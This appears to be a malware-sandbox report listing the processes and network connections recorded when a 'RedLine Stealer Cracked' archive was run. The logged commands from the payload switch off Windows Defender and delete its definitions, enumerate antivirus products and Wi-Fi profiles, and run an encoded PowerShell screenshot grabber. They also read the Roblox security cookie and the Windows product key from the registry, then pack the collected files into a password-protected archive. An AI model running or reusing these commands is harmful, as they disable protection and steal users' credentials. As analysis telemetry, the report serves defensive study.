"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab53fab58,0x7ffab53fab68,0x7ffab53fab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2236 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3044 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3048 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4540 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4684 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5044 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap28523:108:7zEvent7301
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4520 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5260 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:8
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\RedLine Stealer Cracked.rar"
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\RedLine Stealer Cracked\" -spe -an -ai#7zMap11500:108:7zEvent17184
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 --field-trial-handle=1932,i,9539914700506795074,3839163987104339199,131072 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap1643:108:7zEvent28835
C:\Users\Admin\Downloads\RedLine Stealer Cracked\RedLine.MainPanel-cracked.exe
"C:\Users\Admin\Downloads\RedLine Stealer Cracked\RedLine.MainPanel-cracked.exe"
C:\Users\Admin\AppData\Local\Temp\RedLine.MainPanel-cracked.exe
"C:\Users\Admin\AppData\Local\Temp\RedLine.MainPanel-cracked.exe"
C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â zip.exe
"C:\Users\Admin\AppData\Local\Temp\GERDA-Êðèïò â zip.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Anarchy.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nq2q5szl\nq2q5szl.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES23DF.tmp" "c:\Users\Admin\AppData\Local\Temp\nq2q5szl\CSCFA7FE335C0F441A3AA50E218FF30C3F8.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4780"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 4780
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2612"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2612
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2864"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2864
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5648"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5648
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5636"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5636
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1488"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 1488
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2064"
C:\Windows\system32\taskkill.exe
taskkill /F /PID 2064
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI14082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\71TY7.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI14082\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI14082\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\71TY7.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe
"C:\Users\Admin\Downloads\RedLine Stealer Cracked\Libraries\builder.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | zelenka.guru | udp |
| FR | 151.80.169.28:443 | zelenka.guru | tcp |
| US | 8.8.8.8:53 | embed.reddit.com | udp |
| US | 151.101.1.140:443 | embed.reddit.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.169.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
